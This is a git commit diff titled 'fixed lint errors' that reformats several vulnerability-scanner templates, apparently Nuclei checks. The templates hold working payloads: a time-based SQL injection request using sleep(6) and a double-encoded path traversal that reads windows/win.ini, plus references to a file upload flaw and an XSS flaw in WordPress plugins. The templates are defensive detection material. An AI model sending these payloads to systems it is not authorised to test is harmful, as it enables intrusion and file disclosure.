fixed lint errors
Prince Chaddha
parent
f1259b9e8d
commit
15e9456960
|
|
@ -26,10 +26,10 @@ variables:
|
||||||
|
|
||||||
http:
|
http:
|
||||||
- raw:
|
- raw:
|
||||||
- |
|
- |
|
||||||
@timeout: 30s
|
@timeout: 30s
|
||||||
GET /?wmcAction=wmcTrack&siteId=34&url=test&uid=01&pid=02&visitorId={{str}}%27,sleep(6),0,0,0,0,0);--+- HTTP/1.1
|
GET /?wmcAction=wmcTrack&siteId=34&url=test&uid=01&pid=02&visitorId={{str}}%27,sleep(6),0,0,0,0,0);--+- HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
|
|
|
||||||
|
|
@ -1,4 +1,4 @@
|
||||||
id: ozeki-10-sms-gateway-lfi
|
id: ozeki-10-sms-gateway
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Ozeki 10 SMS Gateway 10.3.208 - Arbitrary File Read
|
name: Ozeki 10 SMS Gateway 10.3.208 - Arbitrary File Read
|
||||||
|
|
@ -18,7 +18,7 @@ http:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fwindows/win.ini"
|
- "{{BaseURL}}/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fwindows/win.ini"
|
||||||
|
|
||||||
matchers:
|
matchers:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
dsl:
|
dsl:
|
||||||
|
|
|
||||||
|
|
@ -1,17 +1,17 @@
|
||||||
id: wp-gallery-file-upload
|
id: wp-gallery-file-upload
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: WordPress Plugin Gallery 3.06 - Arbitrary File Upload
|
name: WordPress Plugin Gallery 3.06 - Arbitrary File Upload
|
||||||
author: r3Y3r53
|
author: r3Y3r53
|
||||||
severity: high
|
severity: high
|
||||||
description: |
|
description: |
|
||||||
The Gallery by BestWebSoft WordPress plugin was affected by an Unauthenticated File Upload PHP Code Execution security vulnerability.
|
The Gallery by BestWebSoft WordPress plugin was affected by an Unauthenticated File Upload PHP Code Execution security vulnerability.
|
||||||
remediation: Fixed in version 3.1.1
|
remediation: Fixed in version 3.1.1
|
||||||
reference:
|
reference:
|
||||||
- https://www.exploit-db.com/exploits/18998
|
- https://www.exploit-db.com/exploits/18998
|
||||||
- http://wordpress.org/extend/plugins/gallery-plugin/
|
- http://wordpress.org/extend/plugins/gallery-plugin/
|
||||||
- http://downloads.wordpress.org/plugin/gallery-plugin.3.06.zip
|
- http://downloads.wordpress.org/plugin/gallery-plugin.3.06.zip
|
||||||
- https://wpscan.com/vulnerability/049c8518-1f52-4aa4-b0b3-218289727353
|
- https://wpscan.com/vulnerability/049c8518-1f52-4aa4-b0b3-218289727353
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 1
|
max-request: 1
|
||||||
verified: true
|
verified: true
|
||||||
|
|
|
||||||
|
|
@ -6,8 +6,8 @@ info:
|
||||||
severity: medium
|
severity: medium
|
||||||
description: |
|
description: |
|
||||||
The qname, i_qwiz, session_id and username parameters passed to the registration_complete.php file are affected by XSS issues.
|
The qname, i_qwiz, session_id and username parameters passed to the registration_complete.php file are affected by XSS issues.
|
||||||
remediation: Fixed in version 3.37
|
remediation: Fixed in version 3.37
|
||||||
reference:
|
reference:
|
||||||
- https://wpscan.com/vulnerability/d3c10f69-87b6-43fd-bcbc-c2d35b683ff4
|
- https://wpscan.com/vulnerability/d3c10f69-87b6-43fd-bcbc-c2d35b683ff4
|
||||||
- https://packetstormsecurity.com/files/154403/
|
- https://packetstormsecurity.com/files/154403/
|
||||||
- https://wordpress.org/plugins/qwiz-online-quizzes-and-flashcards/
|
- https://wordpress.org/plugins/qwiz-online-quizzes-and-flashcards/
|
||||||
|
|
|
||||||
Loading…
Reference in New Issue